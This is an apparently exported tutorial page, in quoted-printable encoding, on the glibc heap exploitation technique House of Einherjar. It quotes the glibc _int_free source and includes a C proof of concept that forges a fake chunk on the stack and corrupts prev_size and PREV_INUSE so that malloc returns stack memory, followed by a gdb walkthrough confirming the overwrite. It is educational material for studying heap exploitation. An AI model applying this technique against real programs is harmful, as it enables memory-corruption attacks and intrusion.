Date: Thu, 28 Mar 2024 23:38:20 +0000 (UTC) Message-ID: <1508554810.979.1711669100152@instance-2.us-central1-a.c.lazenca.internal> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_978_573413428.1711669100151" ------=_Part_978_573413428.1711669100151 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: file:///C:/exported.html
<= /p>
E= xcuse the ads! We need some help to keep our site up.
_int_free () checks if the pointer passed is a chunk to be included = in fastbin.
And if the chunk is not fastbin, check if it is a chunk obtained by = mmap().
_int_free () checks to see if the chunk's "size" has the PREV_INUSE = flag set.
/* Consolidate other non-mmapped chunks as they arrive. */ else if (!chunk_is_mmapped(p)) { if (! have_lock) { __libc_lock_lock (av->mutex); locked =3D 1; } nextchunk =3D chunk_at_offset(p, size); /* Lightweight tests: check whether the block is already the top block. */ if (__glibc_unlikely (p =3D=3D av->top)) { =09errstr =3D "double free or corruption (top)"; =09goto errout; } /* Or whether the next chunk is beyond the boundaries of the arena. */ if (__builtin_expect (contiguous (av) =09=09=09 && (char *) nextchunk =09=09=09 >=3D ((char *) av->top + chunksize(av->top)), 0)) { =09errstr =3D "double free or corruption (out)"; =09goto errout; } /* Or whether the block is actually not marked used. */ if (__glibc_unlikely (!prev_inuse(nextchunk))) { =09errstr =3D "double free or corruption (!prev)"; =09goto errout; } nextsize =3D chunksize(nextchunk); if (__builtin_expect (chunksize_nomask (nextchunk) <=3D 2 * SIZE_SZ,= 0) =09|| __builtin_expect (nextsize >=3D av->system_mem, 0)) { =09errstr =3D "free(): invalid next size (normal)"; =09goto errout; } free_perturb (chunk2mem(p), size - 2 * SIZE_SZ); /* consolidate backward */ if (!prev_inuse(p)) { prevsize =3D prev_size (p); size +=3D prevsize; p =3D chunk_at_offset(p, -((long) prevsize)); unlink(av, p, bck, fwd); } if (nextchunk !=3D av->top) { /* get and clear inuse bit */ nextinuse =3D inuse_bit_at_offset(nextchunk, nextsize); /* consolidate forward */ if (!nextinuse) { =09unlink(av, nextchunk, bck, fwd); =09size +=3D nextsize; } else =09clear_inuse_bit_at_offset(nextchunk, 0); /* =09Place the chunk in unsorted chunk list. Chunks are =09not placed into regular bins until after they have =09been given one chance to be used in malloc. */ bck =3D unsorted_chunks(av); fwd =3D bck->fd; if (__glibc_unlikely (fwd->bk !=3D bck)) =09{ =09 errstr =3D "free(): corrupted unsorted chunks"; =09 goto errout; =09} p->fd =3D fwd; p->bk =3D bck; if (!in_smallbin_range(size)) =09{ =09 p->fd_nextsize =3D NULL; =09 p->bk_nextsize =3D NULL; =09} bck->fd =3D p; fwd->bk =3D p; set_head(p, size | PREV_INUSE); set_foot(p, size); check_free_chunk(av, p); } /* If the chunk borders the current high end of memory, consolidate into top */ else { size +=3D nextsize; set_head(p, size | PREV_INUSE); av->top =3D p; check_chunk(av, p); }
Write a fake free chunk on the stack and allocate 2 memory of size n= ot corresponding to fast bins.
#include= <stdio.h> #include <malloc.h> #include <unistd.h> int main() { unsigned long fake_chunk[6]; fprintf(stderr,"fake_chunk : %p\n", fake_chunk); fake_chunk[0] =3D 0x100; fake_chunk[2] =3D (unsigned long)fake_chunk; fake_chunk[3] =3D (unsigned long)fake_chunk; fake_chunk[4] =3D (unsigned long)fake_chunk; fake_chunk[5] =3D (unsigned long)fake_chunk; unsigned long *buf1 =3D malloc(0x70); unsigned long *buf2 =3D malloc(0xf0); =20 fake_chunk[1] =3D (char*)(buf2 - 2) - (char*)fake_chunk; *(buf2 - 2) =3D (char*)(buf2 - 2) - (char*)fake_chunk; *(buf2 - 1) =3D 0x100; free(buf2); char *buf4 =3D malloc(0x200); read(STDIN_FILENO,buf4, 0x200); }
lazenca= 0x0@ubuntu:~$ gdb -q ./house_of_einherjar Reading symbols from ./house_of_einherjar...(no debugging symbols found)...= done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004006a6 <+0>:=09push rbp 0x00000000004006a7 <+1>:=09mov rbp,rsp 0x00000000004006aa <+4>:=09sub rsp,0x60 0x00000000004006ae <+8>:=09mov rax,QWORD PTR fs:0x28 0x00000000004006b7 <+17>:=09mov QWORD PTR [rbp-0x8],rax 0x00000000004006bb <+21>:=09xor eax,eax 0x00000000004006bd <+23>:=09mov rax,QWORD PTR [rip+0x20099c] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006c4 <+30>:=09lea rdx,[rbp-0x40] 0x00000000004006c8 <+34>:=09mov esi,0x400874 0x00000000004006cd <+39>:=09mov rdi,rax 0x00000000004006d0 <+42>:=09mov eax,0x0 0x00000000004006d5 <+47>:=09call 0x400580 <fprintf@plt> 0x00000000004006da <+52>:=09mov QWORD PTR [rbp-0x40],0x100 0x00000000004006e2 <+60>:=09lea rax,[rbp-0x40] 0x00000000004006e6 <+64>:=09mov QWORD PTR [rbp-0x30],rax 0x00000000004006ea <+68>:=09lea rax,[rbp-0x40] 0x00000000004006ee <+72>:=09mov QWORD PTR [rbp-0x28],rax 0x00000000004006f2 <+76>:=09lea rax,[rbp-0x40] 0x00000000004006f6 <+80>:=09mov QWORD PTR [rbp-0x20],rax 0x00000000004006fa <+84>:=09lea rax,[rbp-0x40] 0x00000000004006fe <+88>:=09mov QWORD PTR [rbp-0x18],rax 0x0000000000400702 <+92>:=09mov edi,0x70 0x0000000000400707 <+97>:=09call 0x400590 <malloc@plt> 0x000000000040070c <+102>:=09mov QWORD PTR [rbp-0x58],rax 0x0000000000400710 <+106>:=09mov edi,0xf0 0x0000000000400715 <+111>:=09call 0x400590 <malloc@plt> 0x000000000040071a <+116>:=09mov QWORD PTR [rbp-0x50],rax 0x000000000040071e <+120>:=09mov rax,QWORD PTR [rip+0x20093b] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x0000000000400725 <+127>:=09mov rdx,QWORD PTR [rbp-0x58] 0x0000000000400729 <+131>:=09mov esi,0x400885 0x000000000040072e <+136>:=09mov rdi,rax 0x0000000000400731 <+139>:=09mov eax,0x0 0x0000000000400736 <+144>:=09call 0x400580 <fprintf@plt> 0x000000000040073b <+149>:=09mov rax,QWORD PTR [rip+0x20091e] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x0000000000400742 <+156>:=09mov rdx,QWORD PTR [rbp-0x50] 0x0000000000400746 <+160>:=09mov esi,0x400890 0x000000000040074b <+165>:=09mov rdi,rax 0x000000000040074e <+168>:=09mov eax,0x0 0x0000000000400753 <+173>:=09call 0x400580 <fprintf@plt> 0x0000000000400758 <+178>:=09mov rax,QWORD PTR [rbp-0x50] 0x000000000040075c <+182>:=09sub rax,0x10 0x0000000000400760 <+186>:=09mov rdx,rax 0x0000000000400763 <+189>:=09lea rax,[rbp-0x40] 0x0000000000400767 <+193>:=09sub rdx,rax 0x000000000040076a <+196>:=09mov rax,rdx 0x000000000040076d <+199>:=09mov QWORD PTR [rbp-0x38],rax 0x0000000000400771 <+203>:=09mov rax,QWORD PTR [rbp-0x50] 0x0000000000400775 <+207>:=09sub rax,0x10 0x0000000000400779 <+211>:=09mov rdx,QWORD PTR [rbp-0x50] 0x000000000040077d <+215>:=09sub rdx,0x10 0x0000000000400781 <+219>:=09mov rcx,rdx 0x0000000000400784 <+222>:=09lea rdx,[rbp-0x40] 0x0000000000400788 <+226>:=09sub rcx,rdx 0x000000000040078b <+229>:=09mov rdx,rcx 0x000000000040078e <+232>:=09mov QWORD PTR [rax],rdx 0x0000000000400791 <+235>:=09mov rax,QWORD PTR [rbp-0x50] 0x0000000000400795 <+239>:=09sub rax,0x8 0x0000000000400799 <+243>:=09mov QWORD PTR [rax],0x100 0x00000000004007a0 <+250>:=09mov rax,QWORD PTR [rbp-0x50] 0x00000000004007a4 <+254>:=09mov rdi,rax 0x00000000004007a7 <+257>:=09call 0x400540 <free@plt> 0x00000000004007ac <+262>:=09mov edi,0x200 0x00000000004007b1 <+267>:=09call 0x400590 <malloc@plt> 0x00000000004007b6 <+272>:=09mov QWORD PTR [rbp-0x48],rax 0x00000000004007ba <+276>:=09mov rax,QWORD PTR [rbp-0x48] 0x00000000004007be <+280>:=09mov edx,0x200 0x00000000004007c3 <+285>:=09mov rsi,rax 0x00000000004007c6 <+288>:=09mov edi,0x0 0x00000000004007cb <+293>:=09call 0x400560 <read@plt> 0x00000000004007d0 <+298>:=09mov eax,0x0 0x00000000004007d5 <+303>:=09mov rsi,QWORD PTR [rbp-0x8] 0x00000000004007d9 <+307>:=09xor rsi,QWORD PTR fs:0x28 0x00000000004007e2 <+316>:=09je 0x4007e9 <main+323> 0x00000000004007e4 <+318>:=09call 0x400550 <__stack_chk_fail@= plt> 0x00000000004007e9 <+323>:=09leave =20 0x00000000004007ea <+324>:=09ret =20 End of assembler dump. gdb-peda$ b *0x00000000004007a7 Breakpoint 1 at 0x4007a7 gdb-peda$ b *0x00000000004007cb Breakpoint 2 at 0x4007cb gdb-peda$
The PREV_INUSE flag has been removed from the chunk's "size" value.<= /p>
The value of prev_size is 0xffff800000603c50, which is the header ad= dress (0x602080) of the chunk to be released minus the address of the fake = chunk (0x7fffffffe430).
gdb-ped= a$ r Starting program: /home/lazenca0x0/house_of_einherjar=20 fake_chunk : 0x7fffffffe430 buf1 : 0x602010 buf2 : 0x602090 Breakpoint 1, 0x00000000004007a7 in main () gdb-peda$ x/i $rip =3D> 0x4007a7 <main+257>:=09call 0x400540 <free@plt> gdb-peda$ i r rdi rdi 0x602090=090x602090 gdb-peda$ x/4gx 0x602090 - 0x10 0x602080:=090xffff800000603c50=090x0000000000000100 0x602090:=090x0000000000000000=090x0000000000000000 gdb-peda$ p/x 0x602080 - 0xffff800000603c50 $1 =3D 0x7fffffffe430 gdb-peda$ x/4gx 0x7fffffffe430 0x7fffffffe430:=090x0000000000000100=090xffff800000603c50 0x7fffffffe440:=090x00007fffffffe430=090x00007fffffffe430 gdb-peda$ p main_arena.top=20 $2 =3D (mchunkptr) 0x602180 gdb-peda$ ni 0x00000000004007ac in main () gdb-peda$ p main_arena.top=20 $3 =3D (mchunkptr) 0x7fffffffe430 gdb-peda$ x/4gx 0x7fffffffe430 0x7fffffffe430:=090x0000000000000100=090xffff800000624bd1 0x7fffffffe440:=090x00007fffffffe430=090x00007fffffffe430 gdb-peda$
gdb-ped= a$ ni 0x00000000004007b1 in main () gdb-peda$ x/i $rip =3D> 0x4007b1 <main+267>:=09call 0x400590 <malloc@plt> gdb-peda$ ni 0x00000000004007b6 in main () gdb-peda$ i r rax rax 0x7fffffffe440=090x7fffffffe440 gdb-peda$ x/4gx 0x7fffffffe440 0x7fffffffe440:=090x00007fffffffe430=090x00007fffffffe430 0x7fffffffe450:=090x00007fffffffe430=090x00007fffffffe430 gdb-peda$ c Continuing. Breakpoint 2, 0x00000000004007cb in main () gdb-peda$ x/i $rip =3D> 0x4007cb <main+293>:=09call 0x400560 <read@plt> gdb-peda$ i r rsi rsi 0x7fffffffe440=090x7fffffffe440 gdb-peda$ ni AAAAAAAAAAAAAAAA 0x00000000004007d0 in main () gdb-peda$ x/4gx 0x7fffffffe440 0x7fffffffe440:=090x4141414141414141=090x4141414141414141 0x7fffffffe450:=090x00007fffffffe40a=090x00007fffffffe430 gdb-peda$
<= /p>